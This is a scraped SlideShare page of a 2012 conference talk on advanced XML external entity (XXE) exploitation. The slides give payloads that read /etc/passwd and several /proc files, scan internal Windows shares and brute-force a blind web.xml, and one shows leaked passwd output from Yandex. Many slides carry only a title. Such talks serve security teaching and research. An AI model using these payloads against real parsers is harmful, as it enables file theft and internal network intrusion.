XXE: advancedexploitationDC02139, Ukraine, Kyiv, 23/03/2012
XXE basics• Parser bug (feature)• To read local files• To make DoS (by reading /dev/zero loops)<?xml encoding=utf-8 ?><!DO...
Example (Yandex pwn3d for $5000)$ ./xxe-direct.pl<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelopexmlns:SOAP-ENV="h...
Exploitation trick #1. More than 1 fileReading more that 1 files per requestmy $requestbody = "<?xml version=1.0?><!DOCTYP...
Exploitation trick #2. More protocols
Exploitation trick #3. SSRF
Exploitation trick #3. SSRF. PracticeDirbust via XXE and RCE =)
Exploitation trick #4. Wrappers
Exploitation trick #4. Wrappers
Exploitation trick #5. Win filenames
Exploitation trick #6. Win networks Scanning internal network for MS shares <!DOCTYPE scan [ <!ENTITY test-1 SYSTEM "10.0....
Exploitation trick #7. Blind XXE? Reading local XML (w/o parser errors in output) via attrs bruteforce <!DOCTYPE scan SYST...
Exploitation trick #8. Not only web • 3-rd party application • Browsers (local file reading in Safari   2010) • Another on...
???Ukraine, Kyiv, 23/03/2012@d0znppd0znpp@onsec.ru
Upcoming SlideShare
Loading in...5
×

Xxe advanced exploitation

18,552

Published on

Published in: Technology, Education
1 Comment
7 Likes
Statistics
Notes
No Downloads
Views
Total Views
18,552
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
199
Comments
1
Likes
7
Embeds 0
No embeds

No notes for slide

Xxe advanced exploitation

  1. 1. XXE: advancedexploitationDC02139, Ukraine, Kyiv, 23/03/2012
  2. 2. XXE basics• Parser bug (feature)• To read local files• To make DoS (by reading /dev/zero loops)<?xml encoding=utf-8 ?><!DOCTYPE a [<!ENTITY e SYSTEM/etc/passwd> ]><a>&e;</a>
  3. 3. Example (Yandex pwn3d for $5000)$ ./xxe-direct.pl<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelopexmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"xmlns:namesp2="http://namespaces.soaplite.com/perl"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"xmlns:namesp84="http://xml.apache.org/xml-soap"xmlns:xsd="http://www.w3.org/2001/XMLSchema"SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcodexsi:type="xsd:string">SOAP-ENV:511</faultcode><faultstringxsi:type="xsd:string">Unknown language</faultstring><detailxsi:type="xsd:string">Unknown language root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/sh
  4. 4. Exploitation trick #1. More than 1 fileReading more that 1 files per requestmy $requestbody = "<?xml version=1.0?><!DOCTYPE SOAP-ENV [<!ENTITY a0 SYSTEM /etc/hostname><!ENTITY a1 SYSTEM /proc/1/status><!ENTITY a2 SYSTEM /proc/2/status><!ENTITY a3 SYSTEM /proc/3/status>...<!ENTITY asd===beg1n===n&a0;nn&a1;nn&a2;nn&a3;===3nd===> <SOAP-ENV:Header> <locale>&asd;</locale> </SOAP-ENV:Header>
  5. 5. Exploitation trick #2. More protocols
  6. 6. Exploitation trick #3. SSRF
  7. 7. Exploitation trick #3. SSRF. PracticeDirbust via XXE and RCE =)
  8. 8. Exploitation trick #4. Wrappers
  9. 9. Exploitation trick #4. Wrappers
  10. 10. Exploitation trick #5. Win filenames
  11. 11. Exploitation trick #6. Win networks Scanning internal network for MS shares <!DOCTYPE scan [ <!ENTITY test-1 SYSTEM "10.0.0.1C$admins.txt"> <!ENTITY test-2 SYSTEM "10.0.0.2C$admins.txt"> ... <!ENTITY test-N SYSTEM "10.0.0.NC$admins.txt"> ]> <scan>&test-1;</scan>
  12. 12. Exploitation trick #7. Blind XXE? Reading local XML (w/o parser errors in output) via attrs bruteforce <!DOCTYPE scan SYSTEM ../WEB-INF/web.xml ]> PoC only a) XMLattacker+XMLlocal=XMLout b) XSDattacker+XMLlocal=XMLout c) ........ d) ........
  13. 13. Exploitation trick #8. Not only web • 3-rd party application • Browsers (local file reading in Safari 2010) • Another one •… • Take a Chrome reward now ;)
  14. 14. ???Ukraine, Kyiv, 23/03/2012@d0znppd0znpp@onsec.ru
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×